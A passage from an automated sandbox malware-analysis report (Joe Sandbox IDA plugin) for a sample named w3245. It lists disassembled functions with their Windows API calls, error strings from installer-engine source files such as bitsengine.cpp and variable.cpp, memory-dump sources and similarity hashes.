                                                                                                                                                              • Instruction Fuzzy Hash: 33118473D40128BACB42AAD48C45E9EFB78FF14760F10416DFE10A6251D7395E10AB91
                                                                                                                                                              Function 007D820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,007D8E17,0000001A,00000000,?,00000000,00000000), ref: 007D8258
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007D8E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 007D8262
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                              • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                                                                                                              • API String ID: 2186923214-2110050797
                                                                                                                                                              • Opcode ID: a66881d69715bfb8c55b15434f9ecc98cd49a2f9d0b4097038adb21f728a9ab4
                                                                                                                                                              • Instruction ID: f2bd95bfe02d7d2194acf6bc44b70ecd11aca5b63f3cbf4de81d9e8c3740ae4e
                                                                                                                                                              • Opcode Fuzzy Hash: a66881d69715bfb8c55b15434f9ecc98cd49a2f9d0b4097038adb21f728a9ab4
                                                                                                                                                              • Instruction Fuzzy Hash: 8701C232646A25A7D66166994C0AE9B6B6CEF41B70F11401FFD10EB380EE7CAD4045E5
                                                                                                                                                              Function 007EDDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 007EDDCE
                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EDDF8
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,007EDFC8,00000000,?,?,?,?,00000000), ref: 007EDE00
                                                                                                                                                              Strings
                                                                                                                                                              • bitsengine.cpp, xrefs: 007EDE24
                                                                                                                                                              • Failed while waiting for download., xrefs: 007EDE2E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                                                              • String ID: Failed while waiting for download.$bitsengine.cpp
                                                                                                                                                              • API String ID: 435350009-228655868
                                                                                                                                                              • Opcode ID: 2ec78c18a717446927194f298038d6ee8261a37b0f4713a4e85268574e73345b
                                                                                                                                                              • Instruction ID: 11779e3df629a58b01b1216f80ab6b639601ab69def3f804e6572cfffdb0393e
                                                                                                                                                              • Opcode Fuzzy Hash: 2ec78c18a717446927194f298038d6ee8261a37b0f4713a4e85268574e73345b
                                                                                                                                                              • Instruction Fuzzy Hash: 7A11CA7374627577D63096AA9C0DEDB7A9CEB08760F110125FE05FB281D6699D0085E4
                                                                                                                                                              Function 007C5F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetComputerNameW.KERNEL32(?,00000010), ref: 007C5F5C
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C5F66
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ComputerErrorLastName
                                                                                                                                                              • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 3560734967-484636765
                                                                                                                                                              • Opcode ID: 37f300fb91c56f27828a78d118510e9f9b3c616e349f97d607e386a4671c4dc9
                                                                                                                                                              • Instruction ID: dbd1276fbe2159234172e98ebcbc51bfd192654674ca8f5f54834c695ea62980
                                                                                                                                                              • Opcode Fuzzy Hash: 37f300fb91c56f27828a78d118510e9f9b3c616e349f97d607e386a4671c4dc9
                                                                                                                                                              • Instruction Fuzzy Hash: 7111C632A41528ABD7259A949C05FDEB7E8EB08720F11411DFD00FB280DA69AE4486E1
                                                                                                                                                              Function 007C67AA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 56COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 007C67E3
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C67ED
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastPathTemp
                                                                                                                                                              • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 1238063741-2915113195
                                                                                                                                                              • Opcode ID: 46d38a89c0244dd1c43f8902f480f34a7750d753bdff493334c35181f3466e81
                                                                                                                                                              • Instruction ID: 3bd3f090f240d83f808e70ef4d93a84b534275bffa6954d99032b77c716baa71
                                                                                                                                                              • Opcode Fuzzy Hash: 46d38a89c0244dd1c43f8902f480f34a7750d753bdff493334c35181f3466e81
                                                                                                                                                              • Instruction Fuzzy Hash: CA01DB72E42639A7D720AB545C4AFAA77D8AF04710F10416DFD14FB2C1EA689D0086D5
                                                                                                                                                              Function 007C5E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 007C5EA6
                                                                                                                                                                • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
                                                                                                                                                                • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
                                                                                                                                                                • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
                                                                                                                                                                • Part of subcall function 00803D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00803D4C
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get shell folder., xrefs: 007C5EDA
                                                                                                                                                              • Failed to get 64-bit folder., xrefs: 007C5EF0
                                                                                                                                                              • variable.cpp, xrefs: 007C5ED0
                                                                                                                                                              • Failed to set variant value., xrefs: 007C5F0A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                                                              • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                                                              • API String ID: 2084161155-3906113122
                                                                                                                                                              • Opcode ID: 2e1d9436ab9834aec274f612e4887d6e3ae93d03b983e5279d2e77982037e1e2
                                                                                                                                                              • Instruction ID: 773ae3f2eef6994a31854a28e2be2539dac8991d9c386ce3b88537a73c58d8b0
                                                                                                                                                              • Opcode Fuzzy Hash: 2e1d9436ab9834aec274f612e4887d6e3ae93d03b983e5279d2e77982037e1e2
                                                                                                                                                              • Instruction Fuzzy Hash: 6C018C31945619F7DF166794CC0AF9E7B68FF00720F10415DF800F6180DB79AA809BE1
                                                                                                                                                              Function 00804153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00804440: FindFirstFileW.KERNEL32(007E923A,?,00000100,00000000,00000000), ref: 0080447B
                                                                                                                                                                • Part of subcall function 00804440: FindClose.KERNEL32(00000000), ref: 00804487
                                                                                                                                                              • SetFileAttributesW.KERNEL32(007E923A,00000080,00000000,007E923A,000000FF,00000000,?,?,007E923A), ref: 00804182
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007E923A), ref: 0080418C
                                                                                                                                                              • DeleteFileW.KERNEL32(007E923A,00000000,007E923A,000000FF,00000000,?,?,007E923A), ref: 008041AC
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007E923A), ref: 008041B6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 3967264933-2967768451
                                                                                                                                                              • Opcode ID: cf68a25e924d412d0f7016742637d72b3ad2dd3b5f24d671e61e8538c338370e
                                                                                                                                                              • Instruction ID: bacc279e8ee4a324a49bfe58762982c7dd24b7964f724d586e732677b1c5ed38
                                                                                                                                                              • Opcode Fuzzy Hash: cf68a25e924d412d0f7016742637d72b3ad2dd3b5f24d671e61e8538c338370e
                                                                                                                                                              • Instruction Fuzzy Hash: A001F5F2AC1636B7E7714AA99C04B5B7EA8FF24760F010210FE44EA2D0D7228D9085D0
                                                                                                                                                              Function 007EDA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 007EDA1A
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007EDA5F
                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?), ref: 007EDA73
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get state during job modification., xrefs: 007EDA33
                                                                                                                                                              • Failure while sending progress during BITS job modification., xrefs: 007EDA4E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                              • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                                                              • API String ID: 3094578987-1258544340
                                                                                                                                                              • Opcode ID: a3ff35d1442ccfb78e4e478db90f0fdbd2a1e08565a2a0df47ca8a069a5ac6de
                                                                                                                                                              • Instruction ID: 1ed25a8c5203c9fdec6f6bd498821fc390183d8be415bb55f8237d1b96be3348
                                                                                                                                                              • Opcode Fuzzy Hash: a3ff35d1442ccfb78e4e478db90f0fdbd2a1e08565a2a0df47ca8a069a5ac6de
                                                                                                                                                              • Instruction Fuzzy Hash: 0701DE72A06664FBCB21DB56D849AAEBBA8FF08321B008215E805D7600D738AE44CBD0
                                                                                                                                                              Function 007EDC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,007EDDEE), ref: 007EDC92
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000008,?,007EDDEE), ref: 007EDCD7
                                                                                                                                                              • SetEvent.KERNEL32(?,?,007EDDEE), ref: 007EDCEB
                                                                                                                                                              Strings
                                                                                                                                                              • Failure while sending progress., xrefs: 007EDCC6
                                                                                                                                                              • Failed to get BITS job state., xrefs: 007EDCAB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                              • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                                                                                                              • API String ID: 3094578987-2876445054
                                                                                                                                                              • Opcode ID: f22a8a9dd97e2c64aadab44d3a82c8a68adc9c0ebe47ead6cd7bcb326e2a2f5f
                                                                                                                                                              • Instruction ID: c653e13d4ce832ffd8c3f29e79ce7174bf3dbb2c54e29fe8b264d4ab4e53e3d7
                                                                                                                                                              • Opcode Fuzzy Hash: f22a8a9dd97e2c64aadab44d3a82c8a68adc9c0ebe47ead6cd7bcb326e2a2f5f
                                                                                                                                                              • Instruction Fuzzy Hash: 8D012472A02725FFCB229B46DC5999ABBACFF08360B100155F905D3660DB78ED10CBE4
                                                                                                                                                              Function 007ED7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,007EDF52,?,?,?,?,?,?,00000000,00000000), ref: 007ED802
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007EDF52,?,?,?,?,?,?,00000000,00000000), ref: 007ED80D
                                                                                                                                                              • GetLastError.KERNEL32(?,007EDF52,?,?,?,?,?,?,00000000,00000000), ref: 007ED81A
                                                                                                                                                              Strings
                                                                                                                                                              • bitsengine.cpp, xrefs: 007ED83E
                                                                                                                                                              • Failed to create BITS job complete event., xrefs: 007ED848
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                                                              • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                                                                                                                              • API String ID: 3069647169-3441864216
                                                                                                                                                              • Opcode ID: 76fe11dc367ba5c82a876f45b31ce3e5d5e724c9a3c9959f5d600708bd5e32cc
                                                                                                                                                              • Instruction ID: 93517f82a79d654598a02fd1574656b260656cefa8a3fd905507be37abfacb98
                                                                                                                                                              • Opcode Fuzzy Hash: 76fe11dc367ba5c82a876f45b31ce3e5d5e724c9a3c9959f5d600708bd5e32cc
                                                                                                                                                              • Instruction Fuzzy Hash: EE012576942636ABD3209F5ADC05A4BBFA8FF09760B014126FD18E7741D7B49850CBE4
                                                                                                                                                              Function 007CD4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,007D7040,000000B8,00000000,?,00000000,75C0B390), ref: 007CD4B7
                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 007CD4C6
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000000D0,?,007D7040,000000B8,00000000,?,00000000,75C0B390), ref: 007CD4DB
                                                                                                                                                              Strings
                                                                                                                                                              • Engine active cannot be changed because it was already in that state., xrefs: 007CD4FE
                                                                                                                                                              • userexperience.cpp, xrefs: 007CD4F4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                                                                                                              • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                                                                                                                              • API String ID: 3376869089-1544469594
                                                                                                                                                              • Opcode ID: c9ed09e548ce2752b81814411a01f0cf9da1d429140826072f69b3e4633ca427
                                                                                                                                                              • Instruction ID: ac9e10d72f35a7fd0555d595ccefb0cd5f82a9fa6c5e4d56342c906e5f8355e8
                                                                                                                                                              • Opcode Fuzzy Hash: c9ed09e548ce2752b81814411a01f0cf9da1d429140826072f69b3e4633ca427
                                                                                                                                                              • Instruction Fuzzy Hash: 31F0AF72300708AFD7609EAAEC99E9773ACFB99761700442EBA01C3680DB78ED058770
                                                                                                                                                              Function 00801C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00801CB3
                                                                                                                                                              • GetLastError.KERNEL32(?,007C49DA,00000001,?,?,007C4551,?,?,?,?,007C5466,?,?,?,?), ref: 00801CC2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                              • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                                                                                                              • API String ID: 199729137-398595594
                                                                                                                                                              • Opcode ID: 4edaf370546cc965c1eb4c3904c19d4d2fefc0ae8bf4f732f5e683eeb6c074e5
                                                                                                                                                              • Instruction ID: 374e0a19dca16f3b5410c3ed8b977abbc0ad7786eebda93835c584cb7d5eb46b
                                                                                                                                                              • Opcode Fuzzy Hash: 4edaf370546cc965c1eb4c3904c19d4d2fefc0ae8bf4f732f5e683eeb6c074e5
                                                                                                                                                              • Instruction Fuzzy Hash: 7601D636A81636A7EB7216A56C0DF166684FB20BB1F014126BD01EB3D0D728DC80C6D5
                                                                                                                                                              Function 007F495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F490E,00000000,?,007F48AE,00000000,00827F08,0000000C,007F4A05,00000000,00000002), ref: 007F497D
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F4990
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,007F490E,00000000,?,007F48AE,00000000,00827F08,0000000C,007F4A05,00000000,00000002), ref: 007F49B3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                              • Opcode ID: 7615d7758f1d5d0109493a091fda6859a66b0a72873def298143950e8b1a982d
                                                                                                                                                              • Instruction ID: b4a1f507b0a8fd814f5eb7496db07532e1f544530ee246d03aa619a031ff3723
                                                                                                                                                              • Opcode Fuzzy Hash: 7615d7758f1d5d0109493a091fda6859a66b0a72873def298143950e8b1a982d
                                                                                                                                                              • Instruction Fuzzy Hash: 8FF06231A1021CBBCB159F94DC59BAFBFB8FF04711F504069F905A2250CBB95E80CB91
                                                                                                                                                              Function 007C21AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C21F2
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C21FE
                                                                                                                                                                • Part of subcall function 007C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BDB
                                                                                                                                                                • Part of subcall function 007C3BD3: HeapSize.KERNEL32(00000000,?,007C21CC,000001C7,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3BE2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                              • String ID: strutil.cpp
                                                                                                                                                              • API String ID: 3662877508-3612885251
                                                                                                                                                              • Opcode ID: d99c2b448acd6a95a91d6cc48162f4148116c3bd3854748fac14deb89726ee72
                                                                                                                                                              • Instruction ID: 0cbbde06e81e4df580cbd5b6bdec5a08da61c0d9b6c0d1e208b78ec5e1dcb154
                                                                                                                                                              • Opcode Fuzzy Hash: d99c2b448acd6a95a91d6cc48162f4148116c3bd3854748fac14deb89726ee72
